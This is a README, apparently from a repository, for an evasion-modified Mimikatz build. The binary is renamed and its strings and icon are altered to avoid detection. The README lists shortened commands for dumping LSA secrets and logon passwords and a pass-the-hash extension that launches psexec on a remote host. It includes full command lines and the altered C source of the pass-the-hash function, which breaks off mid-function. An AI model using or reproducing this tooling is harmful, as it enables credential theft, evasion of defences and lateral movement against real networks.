#
Updates to the Mimikatz bin
The original mimikatz version used can be found at: https://github.com/gentilkiwi/mimikatz
Modifications:
- Mimikatz was renamed to DvKGMmGn.exe
- Renamed all common files/functions.
- Removed descriptive strings, and other strings as seen.
- Stripped out unused functionality
- Changed icon
#
Command Changes
privilege::debug
is nowpr::d
sekurlsa
-slsa
lsadump
-lsdu
logonpasswords
-lop
privilege
-pr
token
-mrio
elevate
-1up
- pass the hash is now called with
slsa::htp
- logonpasswords is called with
slsa::lop
- lsadump::lsa is now
lsdu::go
(/inject
is now/ynot
) (/patch
is now/pooch
) exit
was changed toquit
#
Custom PSExec Commands
- Adding
/remotepc:<pcname>
to pass-the-hash is the first argument to initiate psexec and is always required. (you do not need to add backslashes\\
) - The path to psexec is always required:
/pexe:C:\Path\to\PSExec.exe
- If you want to execute psexec's
-c
command then you use:/prun:c:\path\to\executable.exe
- Output console text to a file:
/out:C:\outfile.txt
(adds> c:\outfile.txt
to the psexec command) - Use
/sys:1
to add psexec-s
(run as system).
Full mimikatz command executing psexec -c:
.\mimikatz.exe "slsa::htp /user:sbusby /ntlm:xxx /domain:. /remotepc:1.2.3.4 /pexe:C:\psexec.exe /sys:1 /prun:C:\Windows\System32\calc.exe /out:C:\outfile.txt" "quit"
Resulting command created/executed by mimikatz:
C:\psexec.exe \\1.2.3.4 -accepteula -s -c C:\Windows\System32\calc.exe > C:\outfile.txt
#
Executing example commands
Executing an LSA Dump:
mimikatz.exe "privilege::d lsdu::go /ynot"
#
Adjustments made to mimikatz PTH function
The pass-the-hash function was modified to accept additional arguments since mimikatz PTH did not allow for arguments as a part of the PTH command.
NTSTATUS kuhl_m_sekurlsa_pth(int argc, wchar_t * argv[])
{
BYTE ntlm[LM_NTLM_HASH_LENGTH], aes128key[AES_128_KEY_LENGTH], aes256key[AES_256_KEY_LENGTH];
TOKEN_STATISTICS tokenStats;
SEKURLSA_PTH_DATA data = {&tokenStats.AuthenticationId, NULL, NULL, NULL, FALSE};
PWCHAR szUser, szDomain, szRun, szNTLM, szAes128, szAes256, szLuid, szRemotePC, szpsSys, szpsPath, szpsRunPath, szOutPath, szpsCopyRunPath = NULL;
DWORD dwNeededSize;
HANDLE hToken, hNewToken;
PROCESS_INFORMATION processInfos;
BOOL isImpersonate;
WCHAR result[1024]; // array to hold the result.
PCWCHAR dblBack = L"\\\\";
PCWCHAR space = L" ";
if(kull_m_string_args_byName(argc, argv, L"luid", &szLuid, NULL))
{
tokenStats.AuthenticationId.HighPart = 0; // because I never saw it != 0
tokenStats.AuthenticationId.LowPart = wcstoul(szLuid, NULL, 0);
}
else
{
if(kull_m_string_args_byName(argc, argv, L"user", &szUser, NULL))
{
if(kull_m_string_args_byName(argc, argv, L"domain", &szDomain, NULL))
{
isImpersonate = kull_m_string_args_byName(argc, argv, L"impersonate", NULL, NULL);
#pragma warning(push)
#pragma warning(disable:4996)
if (kull_m_string_args_byName(argc, argv, L"pexe", &szpsPath, NULL)) //psexec path
{
if (kull_m_string_args_byName(argc, argv, L"remotepc", &szRemotePC, NULL)) //remote pc path
{
if (kull_m_string_args_byName(argc, argv, L"prun", &szpsRunPath, NULL)) //file to execute
{
PCWCHAR cmd2 = L" -accepteula -c ";
wcscpy(result, szpsPath); // copy string one into the result.
wcscat(result, space); // space
wcscat(result, dblBack); // append string two to the result.
wcscat(result, szRemotePC);
if (kull_m_string_args_byName(argc, argv, L"sys", &szpsSys, NULL)) //-s (system)
{
wcscat(result, L" -s ");
}
wcscat(result, cmd2);
wcscat(result, szpsRunPath);
if (kull_m_string_args_byName(argc, argv, L"out", &szOutPath, NULL)) //output to file
{
PCWCHAR fmt = L" > ";
wcscat(result, fmt);
wcscat(result, szOutPath);
}
kull_m_string_args_byName(argc, argv, L"zz", &szRun, isImpersonate ? _wpgmptr : result);
}
}
}
else
{
kull_m_string_args_byName(argc, argv, L"run", &szRun, isImpersonate ? _wpgmptr : L"cmd.exe");
}